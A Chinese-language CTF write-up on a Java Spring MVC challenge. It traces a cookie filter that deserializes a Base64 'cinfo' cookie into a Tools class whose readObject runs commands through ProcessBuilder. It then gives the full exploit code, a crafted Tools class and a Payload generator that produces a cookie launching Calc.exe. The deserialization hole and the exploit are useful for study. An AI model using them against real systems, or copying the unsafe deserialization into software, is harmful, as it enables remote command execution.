JavaCTF记录

Springmvcdemo

在没有提升权限之前，整个环境只有Cookie是可控的，并且提升权限也是要通过cookie来，先看看它对cookie做了什么，看一下过滤器

public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    Cookie[] cookies = ((HttpServletRequest)request).getCookies();
    boolean exist = false;
    Cookie cookie = null;
    if (cookies != null) {
        Cookie[] var7 = cookies;
        int var8 = cookies.length;

        for(int var9 = 0; var9 < var8; ++var9) {
            Cookie c = var7[var9];
            if (c.getName().equals("cinfo")) {
                exist = true;
                cookie = c;
                break;
            }
        }
    }

    byte[] bytes;
    if (exist) {
        String b64 = cookie.getValue();
        Decoder decoder = Base64.getDecoder();
        bytes = decoder.decode(b64);
        ClientInfo cinfo = null;
        if (!b64.equals("") && bytes != null) {
            try {
                cinfo = (ClientInfo)Tools.parse(bytes);
            } catch (Exception var14) {
                var14.printStackTrace();
            }
        }
        ...

发现过滤器对cookie的处理调用了一个Tools类，再看看Tools类

package com.tools;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;
    private String testCall;

    public Tools() {
    }

    public static Object parse(byte[] bytes) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        return ois.readObject();
    }

    public static byte[] create(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(bos);
        outputStream.writeObject(obj);
        return bos.toByteArray();
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        Object obj = in.readObject();
        (new ProcessBuilder((String[])((String[])obj))).start();
    }
}

这个Tools类的readObject，有一个很明显的命令执行。

那么目的就很明显了，需要去触发这个readObject，也就是说需要反序列化一个Tools类

再看Tools的parse方法有一个很明显的readObject，并且也被过滤器调用了

现在链子已经清晰了。

本地构造一个Tools类

package com.tools;

import java.io.*;

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;

    public static Object parse(byte[] bytes) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        return ois.readObject();
    }
    public String testCall;

    public static byte[] create(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(bos);
        outputStream.writeObject(obj);
        return bos.toByteArray();
    }

    @Serial
    private void writeObject (ObjectOutputStream os) throws IOException {
        os . writeObject(new String[]{"Calc.exe"});
    }

    @Serial
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, IOException {
        Object obj = in.readObject();
        (new ProcessBuilder((String[])obj)).start();
    }
}

Payload

import java.util.Base64;
import com.tools.Tools;

public class Payload {
    public static void main(String[] args) throws Exception {
        Tools load = new Tools();
        byte[] bytes = Tools.create(load);
        Base64.Encoder encoder = Base64.getEncoder();
        System.out.println(encoder.encodeToString(bytes));
    }
}

将得到的数据打印出来修改cookie就成功执行命令了